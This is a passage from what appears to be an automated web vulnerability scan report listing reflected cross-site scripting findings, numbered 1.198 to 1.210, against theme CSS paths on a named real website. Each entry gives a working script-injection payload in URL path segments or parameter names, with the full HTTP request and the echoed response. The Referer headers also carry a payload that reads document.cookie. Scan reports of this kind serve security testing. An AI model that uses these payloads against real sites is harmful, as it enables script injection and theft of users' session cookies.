Last-Modified: Mon, 31 Jan 2011 21:12:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css?eac4c\"><script>alert(1)</script>ba25096ea8d=1" type="hidden" />
...[SNIP]...

1.198. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4c4e"><script>alert(1)</script>67f90b47a97 was submitted in the REST URL parameter 1. This input was echoed as b4c4e\"><script>alert(1)</script>67f90b47a97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentb4c4e"><script>alert(1)</script>67f90b47a97/themes/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentb4c4e\"><script>alert(1)</script>67f90b47a97/themes/rt_mynxx_wp/css/rokmoomenu.css" type="hidden" />
...[SNIP]...

1.199. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bcf4"><script>alert(1)</script>f3abb3d23ef was submitted in the REST URL parameter 2. This input was echoed as 2bcf4\"><script>alert(1)</script>f3abb3d23ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes2bcf4"><script>alert(1)</script>f3abb3d23ef/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes2bcf4\"><script>alert(1)</script>f3abb3d23ef/rt_mynxx_wp/css/rokmoomenu.css" type="hidden" />
...[SNIP]...

1.200. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb741"><script>alert(1)</script>99ae03579d0 was submitted in the REST URL parameter 3. This input was echoed as eb741\"><script>alert(1)</script>99ae03579d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wpeb741"><script>alert(1)</script>99ae03579d0/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wpeb741\"><script>alert(1)</script>99ae03579d0/css/rokmoomenu.css" type="hidden" />
...[SNIP]...

1.201. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d4b"><script>alert(1)</script>cf7dabca00c was submitted in the REST URL parameter 4. This input was echoed as d8d4b\"><script>alert(1)</script>cf7dabca00c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/cssd8d4b"><script>alert(1)</script>cf7dabca00c/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/cssd8d4b\"><script>alert(1)</script>cf7dabca00c/rokmoomenu.css" type="hidden" />
...[SNIP]...

1.202. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5fa5"><script>alert(1)</script>d67de01ff03 was submitted in the REST URL parameter 5. This input was echoed as f5fa5\"><script>alert(1)</script>d67de01ff03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.cssf5fa5"><script>alert(1)</script>d67de01ff03 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:41 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.cssf5fa5\"><script>alert(1)</script>d67de01ff03" type="hidden" />
...[SNIP]...

1.203. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 758e2"><script>alert(1)</script>4b8bc89c082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 758e2\"><script>alert(1)</script>4b8bc89c082 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css?758e2"><script>alert(1)</script>4b8bc89c082=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:41 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css?758e2\"><script>alert(1)</script>4b8bc89c082=1" type="hidden" />
...[SNIP]...

1.204. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4981c"><script>alert(1)</script>b15b61d6299 was submitted in the REST URL parameter 1. This input was echoed as 4981c\"><script>alert(1)</script>b15b61d6299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content4981c"><script>alert(1)</script>b15b61d6299/themes/rt_mynxx_wp/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:53 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content4981c\"><script>alert(1)</script>b15b61d6299/themes/rt_mynxx_wp/css/template.css" type="hidden" />
...[SNIP]...

1.205. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8683c"><script>alert(1)</script>bcd24929a4c was submitted in the REST URL parameter 2. This input was echoed as 8683c\"><script>alert(1)</script>bcd24929a4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes8683c"><script>alert(1)</script>bcd24929a4c/rt_mynxx_wp/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:06 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes8683c\"><script>alert(1)</script>bcd24929a4c/rt_mynxx_wp/css/template.css" type="hidden" />
...[SNIP]...

1.206. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4df"><script>alert(1)</script>0c240e70acf was submitted in the REST URL parameter 3. This input was echoed as 7b4df\"><script>alert(1)</script>0c240e70acf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp7b4df"><script>alert(1)</script>0c240e70acf/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:39 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:39 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp7b4df\"><script>alert(1)</script>0c240e70acf/css/template.css" type="hidden" />
...[SNIP]...

1.207. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a88e"><script>alert(1)</script>a859c781526 was submitted in the REST URL parameter 4. This input was echoed as 7a88e\"><script>alert(1)</script>a859c781526 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css7a88e"><script>alert(1)</script>a859c781526/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css7a88e\"><script>alert(1)</script>a859c781526/template.css" type="hidden" />
...[SNIP]...

1.208. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a7a5"><script>alert(1)</script>b62332fda7c was submitted in the REST URL parameter 5. This input was echoed as 4a7a5\"><script>alert(1)</script>b62332fda7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/template.css4a7a5"><script>alert(1)</script>b62332fda7c HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css4a7a5\"><script>alert(1)</script>b62332fda7c" type="hidden" />
...[SNIP]...

1.209. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd965"><script>alert(1)</script>e1be0e8eba4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd965\"><script>alert(1)</script>e1be0e8eba4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/template.css?bd965"><script>alert(1)</script>e1be0e8eba4=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:14:23 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:14:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css?bd965\"><script>alert(1)</script>e1be0e8eba4=1" type="hidden" />
...[SNIP]...

1.210. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a40c"><script>alert(1)</script>edd1009451f was submitted in the REST URL parameter 1. This input was echoed as 9a40c\"><script>alert(1)</script>edd1009451f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

